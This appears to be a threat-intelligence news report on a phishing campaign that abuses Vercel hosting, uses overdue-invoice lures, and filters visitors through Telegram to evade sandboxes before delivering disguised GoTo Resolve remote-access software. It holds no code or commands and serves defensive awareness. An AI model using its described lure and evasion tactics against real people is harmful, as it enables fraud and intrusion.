A sophisticated phishing campaign, active between November 2025 and January 2026, has been identified leveraging Vercel’s legitimate hosting platform to distribute remote access tools. This advanced attack chain combines social engineering with the exploitation of trusted domains, enabling it to effectively bypass traditional security measures and deliver potent malware to unsuspecting victims.
The threat actors have been employing financially themed lures, such as overdue invoice notifications, payment statements, and shipping documents, in their phishing emails. These messages are designed to create a sense of urgency, compelling recipients to click on malicious links. The campaign represents a notable shift in threat actor tactics, moving beyond simple malware delivery to implement more advanced evasion techniques.
Victims receive emails that often contain urgency-driven language, such as “43 days past due” or warnings of service suspension. This tactic aims to pressure individuals into interacting with hyperlinked content. The attackers capitalize on Vercel’s established reputation as a trusted platform, which helps the malicious emails bypass standard email filters and fosters a false sense of security among recipients.
Some variants of the campaign have been observed targeting specific geographical regions. For instance, Spanish-language emails have been used to impersonate security update notifications. Other campaigns impersonate legitimate services, such as Adobe PDF viewers or recognized financial portals, further enhancing their credibility and the likelihood of successful exploitation.
Cloudflare analysts detected this threat while investigating patterns of Vercel platform abuse. Their findings indicate that the campaign had undergone significant evolution since its initial documentation in June 2025 by CyberArmor. Researchers noted that the threat actors implemented sophisticated Telegram-based filtering mechanisms. These systems are designed to detect and block security researchers and automated sandboxes from accessing the malicious payload, thereby hindering analysis efforts.
Infection Through Browser Fingerprinting and Conditional Delivery
Upon clicking a malicious Vercel link, victims encounter a technically advanced evasion mechanism before any payload is delivered. The attacker’s infrastructure performs browser fingerprinting, collecting detailed information such as IP addresses, device types, browser versions, and geographic location. This collected data is then exfiltrated to a Telegram channel controlled by the threat actors.
Automated systems within the Telegram channel evaluate the gathered information to determine if the visitor represents a genuine target. Security researchers and suspicious connections are deliberately filtered out. Only approved visitors proceed to the next stage, which involves a fake document viewer interface. This conditional delivery mechanism significantly reduces the chances of detection by security tools.
Users are then prompted to download files that are disguised as legitimate documents. These files often have names that mimic legitimate financial records, such as “Statements05122025.exe” or “Invoice06092025.exe.bin.” The actual payload utilized in these attacks is not custom-developed malware. Instead, attackers are employing a legitimate, signed copy of GoTo Resolve (formerly LogMeIn) remote access software.
By adopting this “Living off the Land” technique, attackers successfully bypass signature-based antivirus detection systems. Once executed, the GoTo Resolve software establishes connections to remote command servers. This grants the threat actors complete remote control and comprehensive system access to the compromised machines, allowing for further malicious activities.
The campaign’s sophisticated operational security, including the use of Telegram for exfiltration and filtering, coupled with the exploitation of trusted platforms like Vercel, poses a significant challenge for cybersecurity defenses. The reliance on legitimate remote access tools further complicates detection and attribution efforts for this evolving phishing campaign.